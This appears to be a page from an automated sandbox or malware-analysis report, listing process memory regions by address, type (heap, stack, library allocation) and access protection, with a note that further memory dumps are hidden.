|
page read and write
|
||
1C16988C000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CD9000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C1696F1000
|
trusted library allocation
|
page read and write
|
||
1C167D10000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C169944000
|
trusted library allocation
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
360AD7B000
|
stack
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1994BD13000
|
heap
|
page read and write
|
||
1C1671B8000
|
trusted library allocation
|
page read and write
|
||
1C167E94000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1994CA40000
|
trusted library allocation
|
page read and write
|
||
1994BCFE000
|
heap
|
page read and write
|
||
1000F2000
|
stack
|
page read and write
|
||
1C167E16000
|
heap
|
page read and write
|
||
1C1671C4000
|
trusted library allocation
|
page read and write
|
||
1B965207000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1B965420000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1994BC8B000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167D1F000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C169930000
|
trusted library allocation
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
360C8FE000
|
stack
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167DEE000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
19951320000
|
trusted library allocation
|
page read and write
|
||
199511C0000
|
trusted library allocation
|
page read and write
|
||
360BDFE000
|
stack
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C169848000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C169720000
|
heap
|
page read and write
|
||
360BB7E000
|
unkown
|
page readonly
|
||
1C167D2C000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
19952000000
|
heap
|
page read and write
|
||
1C169940000
|
trusted library allocation
|
page read and write
|
||
1C16974B000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167D10000
|
heap
|
page read and write
|
||
360AC7E000
|
unkown
|
page readonly
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1B965480000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
360C97E000
|
unkown
|
page readonly
|
||
1994BEF0000
|
heap
|
page read and write
|
||
1C16DEB0000
|
trusted library allocation
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1994CCF0000
|
trusted library allocation
|
page read and write
|
||
19951483000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
360B77E000
|
unkown
|
page readonly
|
||
360B17B000
|
stack
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
7DF4E0811000
|
trusted library allocation
|
page execute read
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167D03000
|
heap
|
page read and write
|
||
1C167D26000
|
heap
|
page read and write
|
||
19951442000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C16978F000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
199511D1000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
360B27E000
|
unkown
|
page readonly
|
||
1C167CF7000
|
heap
|
page read and write
|
||
19951454000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C169857000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C1697AD000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1994CBF0000
|
trusted library section
|
page readonly
|
||
1C167CDD000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167224000
|
trusted library allocation
|
page read and write
|
||
1C167D10000
|
heap
|
page read and write
|
||
19951310000
|
trusted library allocation
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
360C37E000
|
unkown
|
page readonly
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C16727C000
|
trusted library allocation
|
page read and write
|
||
1C16718C000
|
trusted library allocation
|
page read and write
|
||
1C167D03000
|
heap
|
page read and write
|
||
1C169772000
|
heap
|
page read and write
|
||
1C16DEC0000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C169968000
|
trusted library allocation
|
page read and write
|
||
1C169697000
|
trusted library allocation
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C169705000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167C91000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
199514EC000
|
heap
|
page read and write
|
||
1C167D14000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1994BE10000
|
heap
|
page read and write
|
||
1C167D31000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
199514FD000
|
heap
|
page read and write
|
||
1C167E20000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
19951214000
|
trusted library allocation
|
page read and write
|
||
1C169844000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
10109B000
|
stack
|
page read and write
|
||
1C167210000
|
trusted library allocation
|
page read and write
|
||
360AE7E000
|
unkown
|
page readonly
|
||
1C167CF7000
|
heap
|
page read and write
|
||
199511D0000
|
trusted library allocation
|
page read and write
|
||
19951330000
|
trusted library allocation
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167E32000
|
heap
|
page read and write
|
||
1994C51A000
|
heap
|
page read and write
|
||
199514E3000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167E51000
|
heap
|
page read and write
|
||
1C167208000
|
trusted library allocation
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CF9000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C169980000
|
trusted library allocation
|
page read and write
|
||
1B966C50000
|
heap
|
page read and write
|
||
10074C000
|
stack
|
page read and write
|
||
100B4D000
|
stack
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1994BC2B000
|
heap
|
page read and write
|
||
10119E000
|
stack
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
199514F1000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1994C513000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
360BF7E000
|
unkown
|
page readonly
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C169855000
|
heap
|
page read and write
|
||
1C167218000
|
trusted library allocation
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C1699D4000
|
trusted library allocation
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
10064C000
|
stack
|
page read and write
|
||
1C169695000
|
trusted library allocation
|
page read and write
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167230000
|
trusted library allocation
|
page read and write
|
||
1994C502000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C16DEB0000
|
trusted library allocation
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1B966C6E000
|
heap
|
page read and write
|
||
19951502000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C167CEB000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C1699D4000
|
trusted library allocation
|
page read and write
|
||
100C4E000
|
stack
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C1671D9000
|
trusted library allocation
|
page read and write
|
||
360BE7E000
|
unkown
|
page readonly
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C167C70000
|
heap
|
page read and write
|
||
19951380000
|
remote allocation
|
page read and write
|
||
1C167470000
|
trusted library allocation
|
page read and write
|
||
1994BC3F000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1994C415000
|
heap
|
page read and write
|
||
1C16DED0000
|
trusted library allocation
|
page read and write
|
||
199514E5000
|
heap
|
page read and write
|
||
1994CBA0000
|
trusted library section
|
page readonly
|
||
1C167CF3000
|
heap
|
page read and write
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1995150A000
|
heap
|
page read and write
|
||
1B966C54000
|
heap
|
page read and write
|
||
7DF4E0800000
|
trusted library allocation
|
page readonly
|
||
1C167CF7000
|
heap
|
page read and write
|
||
1C169980000
|
trusted library allocation
|
page read and write
|
||
19951300000
|
trusted library allocation
|
page read and write
|
||
1C167E22000
|
heap
|
page read and write
|
||
1B9652B9000
|
heap
|
page read and write
|
||
1C167CED000
|
heap
|
page read and write
|
||
1C167CF2000
|
heap
|
page read and write
|
||
1C169691000
|
trusted library allocation
|
page read and write
|
There are 728 hidden memdumps, click here to show them.